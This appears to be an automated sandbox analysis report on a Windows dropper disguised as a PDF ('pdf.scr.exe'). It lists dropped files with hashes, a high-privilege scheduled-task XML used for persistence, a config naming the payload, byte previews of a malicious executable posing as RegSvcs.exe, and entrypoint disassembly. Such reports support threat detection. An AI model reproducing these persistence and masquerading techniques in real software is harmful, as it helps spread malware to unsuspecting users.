          Preview:vSI328SN6k..b22U8437q8J47L5U907I3x7B5Y173A7N8Puz85zIL8T36k234Fzf99ob92l45b..95547jX65212mG58m4f6199235nR31CZ7621256s00beA28JC7Pv3h3ea..cRPTaZwN1KFY3P076jKj31A6JKuoeIkLZ6N1i8r..b7306180tbqJ63og7n5Uh1467IY717g5XgFrh05679A..09f912e5Y36u6t52g3439jKgW5b8k42E4j7g7CbI741..D1f8596n4941f27UB1t32l2cM263vurrb82Z2h3100j5f13a4t..rntp69qYNq3H6521nc714p98TX9mMvSg0674q43O2u0IA..5B3H154vL47q8nePs766m2e42cZ15Xmr40L7HaUE..v524j8Gx185Z181p4v24..236U8cOS4HGZh7B40XN5924T6k2zT1564p4v89k0F6Lk9kJ034S8q114091yksqW02r27A..K6Sp61sV712736fTwF9H65U6u6V0357jX9610p2mQp553HE0K5S4Qgs86894DeX9n9Ec11y1ka9950F860HQbu7S6b..7OE857clz14431ERN8MeP4k9g8Q29j251BY9b0175jy06Kr3Sy95Vv8328VD..ZsK306xkJ23BQiMc9cU90zZ80q536T281mA7402q6EU6j1w9S6w13LF51tIYduPt5Zo7aL461..2238gW13r2y9i5C1kn9VtiHb8ZUX7066HHV417u9L491Z..6h0E54hz8njAB25hKg9438hZ30p46453jZTD9y8g6Q1Fu5P4r6y0bz80QE..11ms0765691T2104DI7vO4r2v8063n4DDS582d1K6ru303X4517..518aV5l5v525y6dwf875F8II8cxO9097658fhw3103cv26w548HMM57yTYfv5T1L83V69Wj75LO081s7MBlQQM..o6i966447vH00X60wi7fu0

          C:\Users\user\AppData\Local\Temp\Folder8_410\mlvmtln.bin

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):739
          Entropy (8bit):6.2201318566424275
          Encrypted:false
          SSDEEP:12:jg/w0bWJnCzp5tnSA/hVmT6beGfLZKUTyD+wh5z6Wcg7ycQuzV7TWu2xD:juwbnap5siiT6vZD6jz6WMcQAi
          MD5:5B2FFEFEDF016705B02E548D343BD273
          SHA1:71C0005C0BB5259D7A8DF04607DB55E1DC48CFDF
          SHA-256:AE355FD9415586E5D427089E8E8E279A6F1BAAAC4CE24A9FA2039F0B9598BAD8
          SHA-512:BF6146C8C199501B43B2ADBED4A87E812B2E1A00C7E6D24FC2DFA81B47C5B1A85A3E7B189209EE571B33F57DDAA52159C77D91B621AB25EF87DC6E4F2670DB50
          Malicious:false
          Reputation:unknown
          Preview:............................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\mujswngck.docx

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):625
          Entropy (8bit):6.227007206665302
          Encrypted:false
          SSDEEP:12:/bBc8DsAO60OpRKP5WQBpnOjhF0BCynUZEz6i5eQbGcb5x6MniiIAa:D9zpRMbEjhOBT0EjeQtX6Miea
          MD5:EA84F04FF07EFE4DD573DF81C8D73112
          SHA1:56C7C452FDF7EC05DF7EEED80019520B4636636E
          SHA-256:51948EA1E1786F3639B5688CF099946AFEEC48A6DB2B4151E2340CDA19113607
          SHA-512:58EC762815FBB2D3A15FA06610B19017BC7B30D8868E968B93F5478908BEBA2B72551D784A8630835E7F9D50C047FA64452F4B212F4B6430D554A710FC8B9C22
          Malicious:false
          Reputation:unknown
          Preview:..............................................................................................................i...............................................................................................M.........

          C:\Users\user\AppData\Local\Temp\Folder8_410\nbmc.pdf

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):523
          Entropy (8bit):6.2469950217286945
          Encrypted:false
          SSDEEP:12:MREuUZDYGXGpGzsyc8eo4jCEicYevV344JQ8LbHpQFPKs:E5G2Jyc8UCNsI4JQuJQFCs
          MD5:2E80CBC3177C60A2048EFD086D26DB0C
          SHA1:60011CEE58CDCE00026D09516C147445A399265C
          SHA-256:ADB88228E475C736251FD3A11BC7FB41F536FC8F0B80EA7C977153C054AB48FB
          SHA-512:A8DD351B67BEC96AA68512833DD76FF7B02757ACFF82758C93CA4F3D22F98436399FAB1D9E50D9E25C66993A35DE7649207278C49E80B4D0F3683AA3914F32EA
          Malicious:false
          Reputation:unknown
          Preview:.....................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\quxisn.ini

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):540
          Entropy (8bit):6.191048141141158
          Encrypted:false
          SSDEEP:12:7OguD7Nc+8a2rZvnUqyLbSWfhCSl7EF07V4OEnz9T6eJpsjchWZPODQm9y:7Zui+8a2rVVyLbRISl95DEnz9+en9gqy
          MD5:BD2C67C8D59FE4FA46C2BD40B65F2014
          SHA1:303E8754D55A90565DC43581367644F3CF7F3A7A
          SHA-256:3AC63CC62CAEB2B9CA24141616FA10AEF0C64EA6721AB16B8B3E33878B09098D
          SHA-512:40A0D3D8C56F68908B273B532825E9F79BE73DFBBC02CBF0CDC72E4572CADF7837D36F5C75CB1BFDF2D87B39FC0EDE366D45AEEB0B37A80FD8A0968F24259117
          Malicious:false
          Reputation:unknown
          Preview:...........................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\rbtj.dat

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):620
          Entropy (8bit):6.216440012089495
          Encrypted:false
          SSDEEP:12:KmsJX62KCMdStvQy6ws9M7odswOngZIl7tSghIbCFDbfCEvM4cW1PYDAePA4o:K1562KKIXws9ywOBlsghbf9M4cwZ
          MD5:B4D931185A25EC221C09C2E0C7DE0409
          SHA1:3580DF306627E9BE85243FDDE91165A24279273A
          SHA-256:508D3E6C83EF0A34BEBB22F6EE99B11A7214CED3E0748D1D4C751ACA8CCA7C71
          SHA-512:48E022E2ABCF790F95E1198523262EBBAE541C428A090E0D715F502CDBEDFD880B1EAC69AB5528A9055D845D9B722F30D08F0D0FEC2F1616F28403BDFDB6239F
          Malicious:false
          Reputation:unknown
          Preview:......................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\rnnsh.xls

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):109765414
          Entropy (8bit):7.149822507862373
          Encrypted:false
          SSDEEP:786432:jeiFTzFm2V+Ws11rx9irns45XQ0bWPu1EOi6h7ReyeLCD5oAD4Fk/YhswDvybX7+:E
          MD5:1A4F87FE68FAF07769D93372246F7315
          SHA1:756DBF9A1C5C60FA13B3285DF696C370C117A9AD
          SHA-256:AE5869183348BB70CDF4745B2629425B3DC5B9A96A9DCDE7862AC9F0BC97E346
          SHA-512:6C67055DB74FEEEFB9C03B2EA25DEB0680ACE4A9421AC0C458EA7AE4EC17CE24D093F47F7C43AA6553071994AADDCCA0BFF348B751AE7EBCCA6400009C097B2F
          Malicious:false
          Reputation:unknown
          Preview:..;....+L.,.I...4m.U7~.'...ka6k.,H'.I..(cr..?.e...A.{\.D.~.(S{..V.-..&X{...Cq.P..(Jj.saac.....#.c.s....,7..3..U..?..6.4>\...av.8...&...R.D.....L.u.-ej.%.B....E..6.R..39.Ei..`.......@.T...nB....w.D.....(Z..HZln....7......o=...qi.."....w.tw..m....p.Q.C.8.3.1.....Q.k.9.2.0.e.h.4.Y.o.6.n.G.2.x.Z.G.U.t.j.T.2.2.d.X.2.7.....4.3.U.4.7.7.....P.. ...|.b....xrMI.g...$....1..]]f..}..^C.I..sir`)Kcwj..H........V.DH.&.1n.N....C)..9.d....z:t...ed.....":.......H..s.zTc!A..p.[...;..D.A..A:...............c.C.E.7.7.1.5.s.P.J.6.F.1.7.4.4.M.W.O.c.3.1.0.y.6.1.0.8.0.6.0.e.1.1.e.D.0.z.3.Z.....B...u...#`...$.k......|...n....}:.....?.c..!..c..m...lm ...u.....w...g.{C.2*......s....o..{.......".(.RLD..G$.....xi*.h..@a.#.c...y...Hr.,.s..J(.....$..{...O.H.7VQ...p,....sA..X..........<d.)qI.1E..{...........Y.9.l.....t.=.P......2.B.5.3.1.e.X.7.z.4.4.I.z.P.z.7.........0^i.......7..~..@..V..W.n...%....H...?..Z.i..[.(d3........7.3.5.5.0.5.8.8.4.9.w.9.2.U.8.8.7.6.D.p.r.1.0.0.3.w.D.a.4.I.P.3.

          C:\Users\user\AppData\Local\Temp\Folder8_410\tpfplabhr.ppt

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):515
          Entropy (8bit):6.204797250067207
          Encrypted:false
          SSDEEP:12:kXIjadX52agNuuF0Qc4fR1a7EUOAH4MKITBawUQTHl:ktX5xgNuNxURobwMKIlZF
          MD5:62058854A3A0211391D23AFE642D51C5
          SHA1:4333B74DCE3F8564D4156F2D11B66069EE3372F2
          SHA-256:D8E824CBC1D0F179F3733A2B5508200335A6EC646226F0B023E9FB4F94EA6CDE
          SHA-512:FC32610AFF79A33A8BF60624F36AFB4F705C22CFF0FD04C764DA1785EBCE3C69B2DEC865D43D73EC8A9A8F1296836AF73D94681CA1E589EB6423D453D921ABD2
          Malicious:false
          Reputation:unknown
          Preview:.................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\vgbluarp.xl

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):550
          Entropy (8bit):6.251960168682925
          Encrypted:false
          SSDEEP:12:/yLLQ8dGYT/PD4jifw5AFTdBvnOh8LEUvXbkM/:KLLPdp/PDeUw5ArBvOh+7kc
          MD5:9F994AFD9BB142AB8A36D4C58F102F93
          SHA1:8DCB457E7F5EC4BB6B7E32305DD26A4F8D2A681E
          SHA-256:BD5CD1567D60D85D393A1DDCA22A737C89C1B3A3E5A7F8A772BFDE48B8CEA3B6
          SHA-512:BFA1BF3B846EFFFA96A48E91AE6A73E014F74D3459870979EB1117723D88928F8A183723AE5A5A2DA80301F3AFC6B50870E447252D1944664887C375E735ED13
          Malicious:false
          Reputation:unknown
          Preview:................K........[......................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\vgpgtuex.bmp

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):568
          Entropy (8bit):6.181793571320447
          Encrypted:false
          SSDEEP:12:4SJXAaJc93zJwGBv1ofBoOzwyc6it/ShtmACzggy+DjyJ:JQaJm39wi8DzRddMAC7PyJ
          MD5:7D0D7010210F47BBC571277006C8C174
          SHA1:73ED48688E61A32FC3A92E1099C411825FF5E59A
          SHA-256:814C2970E6246BF86415067D9780E8E2F1DD9EAF947C6BC425A815E749A08042
          SHA-512:CC91B14EC49EB15FD9F140C30D5321A42417C1F4C6C81222746A7A616AF83B9FEE4FCF4F8CAEE203688A08C6D1C6D3B74E4D9F6AEB4B1B50F3813F57387A0434
          Malicious:false
          Reputation:unknown
          Preview:....................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\vjdtaskm.txt

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):659
          Entropy (8bit):6.246268360923076
          Encrypted:false
          SSDEEP:12:RUGtgFsr3B1AMOed5A3CEm5s6K6l5/FuMOkJ7vzu5hgrr/YoBVw1G+uD:CGtVr3B83C7s6NPuPVhg3zw1Gf
          MD5:166AD43D9C2CA35E2F55412A6ED8B515
          SHA1:5A5E8831BABF7E9FC4233417AA04046D45FFFC57
          SHA-256:4CB41D553941E698BD92DD077AE3CCE0E4ECA9DCCA9EAF2C3EA76C48C3A9A26E
          SHA-512:135E04042383237D766F1FB3CEC42C9E9400C71C34A8F0D7B46CBBD594189DD186507DA05E5DB8E71121FA57E7A74E6B38FACB424038CC65D993BE1EAF8D91DB
          Malicious:false
          Reputation:unknown
          Preview:...................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\vtmv.xls

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):603
          Entropy (8bit):6.243174528289961
          Encrypted:false
          SSDEEP:12:brw87rpvWqPZNtLlQN1MxCRQqw5ShuQYL2ptJ7BTmhFKAPN6bjEr2JM02Wb6rRn:brw87VeuzfQN1sCRQqCOUMtXUk1jhxGt
          MD5:02C0FBC15743BE076F645E223C92ACCB
          SHA1:76DB0F874C4462B5DED61D9104FCEC0E3C95D273
          SHA-256:C74821B50B9A993F24F4BB8788FF69A77A96C4A19DE69711564C26103D6D3F68
          SHA-512:E6CE845F43A37429DA29690951780958EFD7F95CA1AAE1D2D9F8146B93419C8DDFF0750A8F29127E3B89482890075964843C3D17C5FDC08704CD6E6079CE4DAC
          Malicious:false
          Reputation:unknown
          Preview:..............T....'............................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\xnhbpesj.pdf

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):555
          Entropy (8bit):6.222922480311702
          Encrypted:false
          SSDEEP:12:BRudpgMXWpbVanAogLyE9387xsqwp7kxG8f5bUxjl:BkDWpbVanAo9EB8V/wpgA8f5bUJl
          MD5:CE86D4806786B5285DC23D378067A353
          SHA1:0D61DE00AC334DCBDA6B3E320E880DFADB2482C3
          SHA-256:24FD150DC97AC04C8D9AA8F482A994788D5B77578B16B6028B9980249FC724A8
          SHA-512:6ADE617608EB8453DEB3E43FBA45A1F3B39D6D7C78809CE9504676ECAD7CDE8F1B59BFC79C561E9687AE13FF5F359EBFE3C4DD198207298BEA25E530D412DEC3
          Malicious:false
          Reputation:unknown
          Preview:........................................................................................................................................................F..................>...................

          C:\Users\user\AppData\Local\Temp\Folder8_410\xopcgkw.xl

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):612
          Entropy (8bit):6.20969596633477
          Encrypted:false
          SSDEEP:12:ZRlLCc8+8GvDRpsxyyNPPHO8VJG1tK3vtueUUtCn2I1sa0Jxun:Z6cftWyypPuB8wiCtF0Jxun
          MD5:55F53F4F242C0DB1E519E3E72DEED805
          SHA1:E9B4CC8F1401B641B5ACA044BF0379C1C2D653F4
          SHA-256:8E858683D645E559E93B7F3C2AD65E847A2EAAADF434190AC8278DDE580BA874
          SHA-512:A4EEF16E2C05DAA7100DCBA1C6044D3333BB947DC79EE66817EF5394E8355686A2A51A0C0F2BE1DE917EDC7E9AD663F34E49380709F356499C95683651951A78
          Malicious:false
          Reputation:unknown
          Preview:...................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\RegSvcs.exe

          Download File
          Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):45152
          Entropy (8bit):6.149629800481177
          Encrypted:false
          SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
          MD5:2867A3817C9245F7CF518524DFD18F28
          SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
          SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
          SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Reputation:unknown
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

          C:\Users\user\AppData\Local\Temp\tmp897A.tmp

          Download File
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1309
          Entropy (8bit):5.0990514427386
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK04kxtn:cbk4oL600QydbQxIYODOLedq35kj
          MD5:77AF6D1744407EBD7E0CEC16F3C7168D
          SHA1:FF4E58917D1AB719E40C68542F663121299DAE67
          SHA-256:A519EB5414D05AC7565B5399D9F1EF717D6846695221B21B51820AA69120EDDC
          SHA-512:529FD47B0605315DDD60D10A99A4830C234C5046C9EE575524C3FC85105C701DCD8EEA4F2A1D8AE444D2E42A2CEF37CE23FB9A2BAF4CB0BAA91B590FB555E691
          Malicious:true
          Reputation:unknown
          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

          C:\Users\user\AppData\Local\Temp\tmp8D34.tmp

          Download File
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1310
          Entropy (8bit):5.109425792877704
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
          Malicious:false
          Reputation:unknown
          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Download File
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:data
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:ZSp:Q
          MD5:6C844091DCB061AD2B62761D1939F235
          SHA1:813C89B6606B3A5510FD924A02BAFCC6FE2B8574
          SHA-256:FBC2997715CCA9BD5F3F08FB0FABD33DD3D13489C40E47952208ED854127AA2C
          SHA-512:62CE0F17F06E366D2CBE8C1C73569D39D50BA3EB2403C8AAD48314B213166A3DC5538375992D3FD99827565B720B029244379A854EAA189EE3B0E0F33D50D665
          Malicious:true
          Reputation:unknown
          Preview:Fb..7..H

          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

          Download File
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):46
          Entropy (8bit):4.3523814564716385
          Encrypted:false
          SSDEEP:3:oNUkh4E2J5xAIwGMNn:oN923fA
          MD5:E01C7B4BFFC4D8966DFDD6831E4904F7
          SHA1:FE638E970FB82742E2C4D7EA3AE7E043589304FB
          SHA-256:ECFA3D73848685C232F4B352A5E24F4995B7D55FF4130A26B7BAEB3839280300
          SHA-512:FD9C41391E076E66F9A65DF18CA790EF06518B8033A5D24BF631E6E7F5EACECF34AD2AA7197FEB8B8FC7ED571A3BEFA0C8C940631F6EE5C0F5996D703B6AC50A
          Malicious:false
          Reputation:unknown
          Preview:C:\Users\user\AppData\Local\Temp\RegSvcs.exe

          C:\Users\user\temp\lvgkma.msc

          Download File
          Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):90
          Entropy (8bit):4.969700668999775
          Encrypted:false
          SSDEEP:3:YRRvutvEOVBJcRAoovKXRGdY2JRMow7:AvCEOVHcoXzpi
          MD5:B48D7F5C0CC7E6A4C737BE0D827B9867
          SHA1:906E2605871B8F319FA2A455C06F2E53940ED777
          SHA-256:B2BACD88BAFE8C668A45AB03A2D5647A9BDDA6CF1361FC821D5A70480B8CCB69
          SHA-512:9E3F4634AF71BCD600576BBD09EBC569E8D5D286ACD07D8E516AD61A80D3447156AEACB59194F24D9C39A1BBE666E038375A94E4AA5A7821D971FD166A7DD694
          Malicious:false
          Reputation:unknown
          Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder8_410..ExE_c=itugx.exe..

          \Device\ConDrv

          Download File
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1141
          Entropy (8bit):4.44831826838854
          Encrypted:false
          SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
          MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
          SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
          SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
          SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
          Malicious:false
          Reputation:unknown
          Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.826498922764083
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:026910003102350.pdf.scr.exe
          File size:1064658
          MD5:c2a80ccf6362bba805072de9ce963ea5
          SHA1:c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
          SHA256:592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
          SHA512:377fbc8008b63f9380ebe0a90db28a191fd3f0eea97dd10e6f16607eb42c51f713cbfb744f2ce73b74093f4866a05e3b00ec7f8b57e2bff2c6a9c8f2118ce707
          SSDEEP:24576:9TbBv5rUeTA/TYaxVKPijItG0bKL1xRMa2LSmnbrDrF:XBvIHBMG02L1N29rDx
          TLSH:95351202BEC196B2D0A3093256767721B97DB9601F68CEDFA3D1466CAD325C0E7317B2
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

          File Icon

          Icon Hash:938c8c90b2ea6ab2

          Static PE Info

          General

          Entrypoint:0x41f530
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:12e12319f1029ec4f8fcbed7e82df162

          Entrypoint Preview

          Instruction
          call 00007FF9B4BF9B7Bh
          jmp 00007FF9B4BF948Dh
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007FF9B4BEC2D7h
          mov dword ptr [esi], 004356D0h
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 004356D8h
          mov dword ptr [ecx], 004356D0h
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 004356B8h
          push eax
          call 00007FF9B4BFC91Fh
          test byte ptr [ebp+08h], 00000001h
          pop ecx
          je 00007FF9B4BF961Ch
          push 0000000Ch
          push esi
          call 00007FF9B4BF8BD9h
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007FF9B4BEC252h
          push 0043BEF0h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007FF9B4BFC3D9h
          int3
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007FF9B4BF9598h
          push 0043C0F4h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007FF9B4BFC3BCh
          int3
          jmp 00007FF9B4BFDE57h
          int3
          int3
          int3
          int3
          push 00422900h
          push dword ptr fs:[00000000h]

          Rich Headers

          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x4a8c.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x690000x233c.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
